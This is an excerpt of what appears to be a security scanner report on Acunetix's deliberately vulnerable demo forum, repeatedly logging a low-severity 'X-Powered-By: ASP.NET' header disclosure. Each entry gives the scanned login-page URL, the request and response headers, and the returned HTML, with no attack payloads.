<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td 